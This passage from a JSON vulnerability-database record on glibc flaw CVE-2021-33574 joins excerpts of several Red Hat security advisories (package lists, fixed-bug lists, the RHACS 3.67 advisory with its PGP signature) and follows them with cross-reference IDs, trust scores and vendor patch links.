86_64.rpm\nglibc-langpack-fo-2.28-164.el8.x86_64.rpm\nglibc-langpack-fr-2.28-164.el8.x86_64.rpm\nglibc-langpack-fur-2.28-164.el8.x86_64.rpm\nglibc-langpack-fy-2.28-164.el8.x86_64.rpm\nglibc-langpack-ga-2.28-164.el8.x86_64.rpm\nglibc-langpack-gd-2.28-164.el8.x86_64.rpm\nglibc
-langpack-gez-2.28-164.el8.x86_64.rpm\nglibc-langpack-gl-2.28-164.el8.x86_64.rpm\nglibc-langpack-gu-2.28-164.el8.x86_64.rpm\nglibc-langpack-gv-2.28-164.el8.x86_64.rpm\nglibc-langpack-ha-2.28-164.el8.x86_64.rpm\nglibc-langpack-hak-2.28-164.el8.x86_64.rpm\nglibc-langpack-he-2.28-164.el8.x86_64.rpm\nglibc-langpack-hi-2.28-164.el8.x86_64.rpm\nglibc-langpack-hif-2.28-164.el8.x86_64.rpm\nglibc-langpack-hne-2.28-164.el8.x86_64.rpm\nglibc-langpack-hr-2.28-164.el8.x86_64.rpm\nglibc-langpack-hsb-2.28-164.el8.x86_64.rpm\nglibc-langpack-ht-2.28-164.el8.x86_64.rpm\nglibc-langpack-hu-2.28-164.el8.x86_64.rpm\nglibc-langpack-hy-2.28-164.el8.x86_64.rpm\nglibc-langpack-ia-2.28-164.el8.x86_64.rpm\nglibc-langpack-id-2.28-164.el8.x86_64.rpm\nglibc-langpack-ig-2.28-164.el8.x86_64.rpm\nglibc-langpack-ik-2.28-164.el8.x86_64.rpm\nglibc-langpack-is-2.28-164.el8.x86_64.rpm\nglibc-langpack-it-2.28-164.el8.x86_64.rpm\nglibc-langpack-iu-2.28-164.el8.x86_64.rpm\nglibc-langpack-ja-2.28-164.el8.x86_64.rpm\nglibc-langpack-ka-2.28-164.el8.x86_64.rpm\nglibc-langpack-kab-2.28-164.el8.x86_64.rpm\nglibc-langpack-kk-2.28-164.el8.x86_64.rpm\nglibc-langpack-kl-2.28-164.el8.x86_64.rpm\nglibc-langpack-km-2.28-164.el8.x86_64.rpm\nglibc-langpack-kn-2.28-164.el8.x86_64.rpm\nglibc-langpack-ko-2.28-164.el8.x86_64.rpm\nglibc-langpack-kok-2.28-164.el8.x86_64.rpm\nglibc-langpack-ks-2.28-164.el8.x86_64.rpm\nglibc-langpack-ku-2.28-164.el8.x86_64.rpm\nglibc-langpack-kw-2.28-164.el8.x86_64.rpm\nglibc-langpack-ky-2.28-164.el8.x86_64.rpm\nglibc-langpack-lb-2.28-164.el8.x86_64.rpm\nglibc-langpack-lg-2.28-164.el8.x86_64.rpm\nglibc-langpack-li-2.28-164.el8.x86_64.rpm\nglibc-langpack-lij-2.28-164.el8.x86_64.rpm\nglibc-langpack-ln-2.28-164.el8.x86_64.rpm\nglibc-langpack-lo-2.28-164.el8.x86_64.rpm\nglibc-langpack-lt-2.28-164.el8.x86_64.rpm\nglibc-langpack-lv-2.28-164.el8.x86_64.rpm\nglibc-langpack-lzh-2.28-164.el8.x86_64.rpm\nglibc-langpack-mag-2.28-164.el8.x86_64.rpm\nglibc-langpack-mai-2.28-164.el8.x86_64.rpm\nglibc-langpack-m
fe-2.28-164.el8.x86_64.rpm\nglibc-langpack-mg-2.28-164.el8.x86_64.rpm\nglibc-langpack-mhr-2.28-164.el8.x86_64.rpm\nglibc-langpack-mi-2.28-164.el8.x86_64.rpm\nglibc-langpack-miq-2.28-164.el8.x86_64.rpm\nglibc-langpack-mjw-2.28-164.el8.x86_64.rpm\nglibc-langpack-mk-2.28-164.el8.x86_64.rpm\nglibc-langpack-ml-2.28-164.el8.x86_64.rpm\nglibc-langpack-mn-2.28-164.el8.x86_64.rpm\nglibc-langpack-mni-2.28-164.el8.x86_64.rpm\nglibc-langpack-mr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ms-2.28-164.el8.x86_64.rpm\nglibc-langpack-mt-2.28-164.el8.x86_64.rpm\nglibc-langpack-my-2.28-164.el8.x86_64.rpm\nglibc-langpack-nan-2.28-164.el8.x86_64.rpm\nglibc-langpack-nb-2.28-164.el8.x86_64.rpm\nglibc-langpack-nds-2.28-164.el8.x86_64.rpm\nglibc-langpack-ne-2.28-164.el8.x86_64.rpm\nglibc-langpack-nhn-2.28-164.el8.x86_64.rpm\nglibc-langpack-niu-2.28-164.el8.x86_64.rpm\nglibc-langpack-nl-2.28-164.el8.x86_64.rpm\nglibc-langpack-nn-2.28-164.el8.x86_64.rpm\nglibc-langpack-nr-2.28-164.el8.x86_64.rpm\nglibc-langpack-nso-2.28-164.el8.x86_64.rpm\nglibc-langpack-oc-2.28-164.el8.x86_64.rpm\nglibc-langpack-om-2.28-164.el8.x86_64.rpm\nglibc-langpack-or-2.28-164.el8.x86_64.rpm\nglibc-langpack-os-2.28-164.el8.x86_64.rpm\nglibc-langpack-pa-2.28-164.el8.x86_64.rpm\nglibc-langpack-pap-2.28-164.el8.x86_64.rpm\nglibc-langpack-pl-2.28-164.el8.x86_64.rpm\nglibc-langpack-ps-2.28-164.el8.x86_64.rpm\nglibc-langpack-pt-2.28-164.el8.x86_64.rpm\nglibc-langpack-quz-2.28-164.el8.x86_64.rpm\nglibc-langpack-raj-2.28-164.el8.x86_64.rpm\nglibc-langpack-ro-2.28-164.el8.x86_64.rpm\nglibc-langpack-ru-2.28-164.el8.x86_64.rpm\nglibc-langpack-rw-2.28-164.el8.x86_64.rpm\nglibc-langpack-sa-2.28-164.el8.x86_64.rpm\nglibc-langpack-sah-2.28-164.el8.x86_64.rpm\nglibc-langpack-sat-2.28-164.el8.x86_64.rpm\nglibc-langpack-sc-2.28-164.el8.x86_64.rpm\nglibc-langpack-sd-2.28-164.el8.x86_64.rpm\nglibc-langpack-se-2.28-164.el8.x86_64.rpm\nglibc-langpack-sgs-2.28-164.el8.x86_64.rpm\nglibc-langpack-shn-2.28-164.el8.x86_64.rpm\nglibc-langpack-shs-2.
28-164.el8.x86_64.rpm\nglibc-langpack-si-2.28-164.el8.x86_64.rpm\nglibc-langpack-sid-2.28-164.el8.x86_64.rpm\nglibc-langpack-sk-2.28-164.el8.x86_64.rpm\nglibc-langpack-sl-2.28-164.el8.x86_64.rpm\nglibc-langpack-sm-2.28-164.el8.x86_64.rpm\nglibc-langpack-so-2.28-164.el8.x86_64.rpm\nglibc-langpack-sq-2.28-164.el8.x86_64.rpm\nglibc-langpack-sr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ss-2.28-164.el8.x86_64.rpm\nglibc-langpack-st-2.28-164.el8.x86_64.rpm\nglibc-langpack-sv-2.28-164.el8.x86_64.rpm\nglibc-langpack-sw-2.28-164.el8.x86_64.rpm\nglibc-langpack-szl-2.28-164.el8.x86_64.rpm\nglibc-langpack-ta-2.28-164.el8.x86_64.rpm\nglibc-langpack-tcy-2.28-164.el8.x86_64.rpm\nglibc-langpack-te-2.28-164.el8.x86_64.rpm\nglibc-langpack-tg-2.28-164.el8.x86_64.rpm\nglibc-langpack-th-2.28-164.el8.x86_64.rpm\nglibc-langpack-the-2.28-164.el8.x86_64.rpm\nglibc-langpack-ti-2.28-164.el8.x86_64.rpm\nglibc-langpack-tig-2.28-164.el8.x86_64.rpm\nglibc-langpack-tk-2.28-164.el8.x86_64.rpm\nglibc-langpack-tl-2.28-164.el8.x86_64.rpm\nglibc-langpack-tn-2.28-164.el8.x86_64.rpm\nglibc-langpack-to-2.28-164.el8.x86_64.rpm\nglibc-langpack-tpi-2.28-164.el8.x86_64.rpm\nglibc-langpack-tr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ts-2.28-164.el8.x86_64.rpm\nglibc-langpack-tt-2.28-164.el8.x86_64.rpm\nglibc-langpack-ug-2.28-164.el8.x86_64.rpm\nglibc-langpack-uk-2.28-164.el8.x86_64.rpm\nglibc-langpack-unm-2.28-164.el8.x86_64.rpm\nglibc-langpack-ur-2.28-164.el8.x86_64.rpm\nglibc-langpack-uz-2.28-164.el8.x86_64.rpm\nglibc-langpack-ve-2.28-164.el8.x86_64.rpm\nglibc-langpack-vi-2.28-164.el8.x86_64.rpm\nglibc-langpack-wa-2.28-164.el8.x86_64.rpm\nglibc-langpack-wae-2.28-164.el8.x86_64.rpm\nglibc-langpack-wal-2.28-164.el8.x86_64.rpm\nglibc-langpack-wo-2.28-164.el8.x86_64.rpm\nglibc-langpack-xh-2.28-164.el8.x86_64.rpm\nglibc-langpack-yi-2.28-164.el8.x86_64.rpm\nglibc-langpack-yo-2.28-164.el8.x86_64.rpm\nglibc-langpack-yue-2.28-164.el8.x86_64.rpm\nglibc-langpack-yuw-2.28-164.el8.x86_64.rpm\nglibc-langpack-zh-2.28-164.el8.
x86_64.rpm\nglibc-langpack-zu-2.28-164.el8.x86_64.rpm\nglibc-locale-source-2.28-164.el8.x86_64.rpm\nglibc-minimal-langpack-2.28-164.el8.x86_64.rpm\nlibnsl-2.28-164.el8.i686.rpm\nlibnsl-2.28-164.el8.x86_64.rpm\nnscd-2.28-164.el8.x86_64.rpm\nnss_db-2.28-164.el8.i686.rpm\nnss_db-2.28-164.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.6.3 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2019088 - \"MigrationController\" CR displays syntax error when unquiescing applications\n2021666 - Route name longer than 63 characters causes direct volume migration to fail\n2021668 - \"MigrationController\" CR ignores the \"cluster_subdomain\" value for direct volume migration routes\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image\n2027196 - \"migration-controller\" pod goes into \"CrashLoopBackoff\" state if an invalid registry route is entered on the \"Clusters\" page of the web console\n2027382 - \"Copy oc describe/oc logs\" window does not close automatically after timeout\n2028841 - \"rsync-client\" container fails during direct volume migration with \"Address family not supported by protocol\" error\n2031793 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if \"MigPlan\" CR contains an invalid \"includedResources\" resource\n2039852 - \"migration-controller\" pod goes into \"CrashLoopBackOff\" state if 
\"MigPlan\" CR contains an invalid \"destMigClusterRef\" or \"srcMigClusterRef\"\n\n5. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6. 
Description:\n\nRed Hat OpenShift Container Storage is software-defined storage integrated\nwith and optimized for the Red Hat OpenShift Container Platform. \nRed Hat OpenShift Container Storage is highly scalable, production-grade\npersistent storage for stateful applications running in the Red Hat\nOpenShift Container Platform. In addition to persistent storage, Red Hat\nOpenShift Container Storage provides a multicloud data management service\nwith an S3 compatible API. \n\nBug Fix(es):\n\n* Previously, when the namespace store target was deleted, no alert was\nsent to the namespace bucket because of an issue in calculating the\nnamespace bucket health. With this update, the issue in calculating the\nnamespace bucket health is fixed and alerts are triggered as expected. \n(BZ#1993873)\n\n* Previously, the Multicloud Object Gateway (MCG) components performed\nslowly and there was a lot of pressure on the MCG components due to\nnon-optimized database queries. With this update the non-optimized\ndatabase queries are fixed which reduces the compute resources and time\ntaken for queries. Bugs fixed (https://bugzilla.redhat.com/):\n\n1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore\u0027s target bucket is deleted\n2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input\n\n5. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ACS 3.67 security and enhancement update\nAdvisory ID: RHSA-2021:4902-01\nProduct: RHACS\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4902\nIssue date: 2021-12-01\nCVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 \n CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 \n CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 \n CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 \n CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 \n CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 \n CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 \n CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 \n CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 \n CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 \n CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 \n CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 \n CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 \n CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 \n=====================================================================\n\n1. Summary:\n\nUpdated images are now available for Red Hat Advanced Cluster Security for\nKubernetes (RHACS). \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. \n\n1. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. \n\n2. 
Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. \n\n3. Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nSecurity Fix(es):\n\n* civetweb: directory traversal when using the built-in example HTTP\nform-based file upload mechanism via the mg_handle_form_request API\n(CVE-2020-27304)\n\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n\n* nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)\n\n* golang: net: incorrect parsing of extraneous zero characters at the\nbeginning of an IP address octet (CVE-2021-29923)\n\n* helm: information disclosure vulnerability (CVE-2021-32690)\n\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. \n\n2. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. \n2. 
The Port exposure method policy criteria now include route as an\nexposure method. \n3. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. \n4. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. \n5. The RHACS Jenkins plugin now provides additional security information. \n6. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. \n7. The default uid:gid pair for the Scanner image is now 65534:65534. \n8. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. \n9. If microdnf is part of an image or shows up in process execution, RHACS\nreports it as a security violation for the Red Hat Package Manager in Image\nor the Red Hat Package Manager Execution security policies. \n10. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. \n11. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. \n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-20673\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-27304\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps:
//access.redhat.com/security/cve/CVE-2021-3801\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-20266\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23343\nhttps://access.redhat.com/security/cve/CVE-2021-23840\nhttps://access.redhat.com/security/cve/CVE-2021-23841\nhttps://access.redhat.com/security/cve/CVE-2021-27645\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-29923\nhttps://access.redhat.com/security/cve/CVE-2021-32690\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-33574\nhttps://access.redhat.com/security/cve/CVE-2021-35942\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-39293\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr\nKjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w\ntKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e\nlq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV\nx4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2\ne8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK\nqnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz\nvguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt\nG4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT\nPTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/\npJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN\nT0pPNmsPGZY=\n=ux5P\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33574"
},
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "VULMON",
"id": "CVE-2021-33574"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-33574",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "165758",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166051",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164863",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166308",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163406",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165862",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021092807",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021070604",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021100416",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3935",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4254",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0394",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3785",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4095",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4019",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3905",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4229",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5140",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3214",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0245",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3336",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0716",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1071",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0493",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3398",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-393646",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33574",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164967",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165129",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165002",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
},
{
"db": "VULMON",
"id": "CVE-2021-33574"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "164863"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166051"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165002"
},
{
"db": "PACKETSTORM",
"id": "165758"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1666"
},
{
"db": "NVD",
"id": "CVE-2021-33574"
}
]
},
"id": "VAR-202105-1306",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-393646"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:22:11.321000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: glibc: CVE-2021-33574: mq_notify does not handle separately allocated thread attributes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=7a9966ec919351d3328669aa69ea5e39"
},
{
"title": "Red Hat: CVE-2021-33574",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-33574"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1736",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1736"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-33574 log"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless 1.20.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220434 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift distributed tracing 2.1.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220318 - Security Advisory"
},
{
"title": "Red Hat: Important: Release of containers for OSP 16.2 director operator tech preview",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220842 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220580 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.2.11 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220856 - Security Advisory"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
},
{
"title": "",
